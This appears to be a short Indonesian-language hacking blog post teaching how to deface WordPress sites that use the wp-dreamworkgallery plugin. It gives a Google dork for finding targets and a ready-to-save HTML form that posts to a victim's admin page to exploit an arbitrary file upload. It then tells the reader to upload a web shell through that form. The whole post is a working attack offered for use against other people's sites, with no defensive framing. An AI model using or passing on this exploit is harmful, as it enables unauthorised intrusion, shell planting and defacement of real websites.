Cara Deface Metode Wp-Dreamwork Gallery
Yupz, Kali Ini saya akan memberikan tutor deface Metode Wp-Dreamwork Galery Simak Kuy :)
Bahan Bahan : Laptop/komputer
:Internet
: Dork
: Csrf
1). Search Di google dork nya :
inurl:/wp-content/plugins/wp-dreamworkgallery/
2). Cari Web yang vuln
3). Paste Csrf Di notepad dan simpan dengan ekstensi .html :
<form action="http://targetlu.com/[path]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" />
<input type="submit" value="Submit" /> </form>
4). Pilih file/shell yg mau lu upload , Lalu Klik Tombol Submit
5).jika sukses akan ada nama file anda beserta file akses nya
Ok, Sekian Dulu Tutor nya Kalau ada yg masih Bingung Komen di bawah , Good Luck <3
Baca Juga Cara Deface Bypass Admin
